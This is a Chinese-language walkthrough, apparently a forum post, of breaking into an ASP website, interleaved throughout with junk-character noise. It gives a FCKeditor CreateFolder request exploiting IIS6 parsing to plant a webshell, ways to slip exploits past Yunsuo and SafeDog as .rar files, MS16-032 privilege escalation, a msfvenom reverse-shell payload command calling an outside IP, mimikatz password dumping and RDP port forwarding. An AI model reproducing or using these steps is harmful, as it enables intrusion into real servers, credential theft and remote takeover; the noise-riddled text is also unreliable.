|
' v3 @2 T$ Q% d) L
) _/ Y! U6 R- A2 r2 h 1 {+ @$ c5 {; T" D: s
, M" K0 A, _/ o1 a/ m; { | , [, O' w8 c. \* X& O
9 O& X3 B& w) e' P& P$ C5 g
; c0 @# _; j( ^- c& Y/ O一、 利用getwebshell篇
4 f7 _$ \- ^( t4 v) p ( w) B, b+ v# P5 O# R0 J# [- q
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: 6 D5 M$ t7 o3 g( J
 ! m7 u) u$ [3 ]2 @5 N+ @

( D4 B' U$ u! o: N7 ^5 l) a下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
. @# J% S# f6 P% y" K& f
- s& u6 R7 ]$ l& Z' G: Z- M7 _- S下面我们构造一个asp目录,如:
. P9 Q/ n) o% T0 ? Z0 J ; ~$ B3 j5 p& r/ w
1 i+ K- ?# p1 d( U http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 8 {) N0 _ v# G" o H
3 d, }' y- f. W w
, ~: A9 T: Z8 p, p2 P 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 % o; P9 j) z" R. e& }6 O
, K/ \& D, [" x1 N) j( i
一、 绕过安全狗云锁提权并且加账号 9 X( H8 z* I3 O

. x8 Y. ~" Y/ @4 q& b, q没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
6 c v# L4 C n1 D: j
* U( P5 U! K4 k- O% p+ n如图: 9 ?0 e- D, q3 ^; K

1 Y7 S$ [1 O: c7 D2 i; M. [% T然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit ' u1 l' e( }0 u% r. j+ x
m, Z6 \" ?5 T! k7 _
一、 利用metasploit 7 c. k2 m$ K+ X% x
) U, s: w% ~' f k" [1 Y% I3 a首先用pentestbox生成一个64位的payload如下命令 * W2 K' S1 t0 Y! i. j
1 [4 x c$ M5 I+ g8 c
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
4 K+ W% x: y! L H6 R 8 m; r9 H: N) ^9 `; u+ E
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
3 b O8 m$ |; S
6 R3 x2 {7 W) P% O5 S8 Y下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: 0 L. V! }! \* X0 |/ F4 @1 E! Z
 6 ~! J* j# u0 a
下面我们来做一个监听如下命令:
' }) V5 |/ q8 o& z8 T 6 D8 H& ~" j/ l* d
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
* V1 C' C' b1 a- J7 f4 ?8 k
- [% I0 s( X6 s$ P P8 |5 g " `0 D5 Q' u- b( T
| 9 g9 O3 a; h% @! _) g+ M' P+ ^
6 k% \7 @" _. r3 |$ w+ ?3 l- A * }9 Y, M$ F, O- _% V- ^/ M
. Q+ @" _9 y; K5 I) H: P
& s% ]7 X; j$ L6 Z! G- [ T7 H2 D& M# L; T# P7 f
# p9 `3 F: B7 E5 ?8 Q1 l; t
# t4 w1 t$ F |* y/ M , P k9 B( V* a
# G* u. O/ g7 `* E# k8 ^2 E9 O
: R8 p# S1 e. a% Y
3 U* k* g0 E- |2 ]/ H; e
/ J2 j+ u: Z; i9 Y
3 y& }3 f; E, m5 j- s3 I e) y4 ? |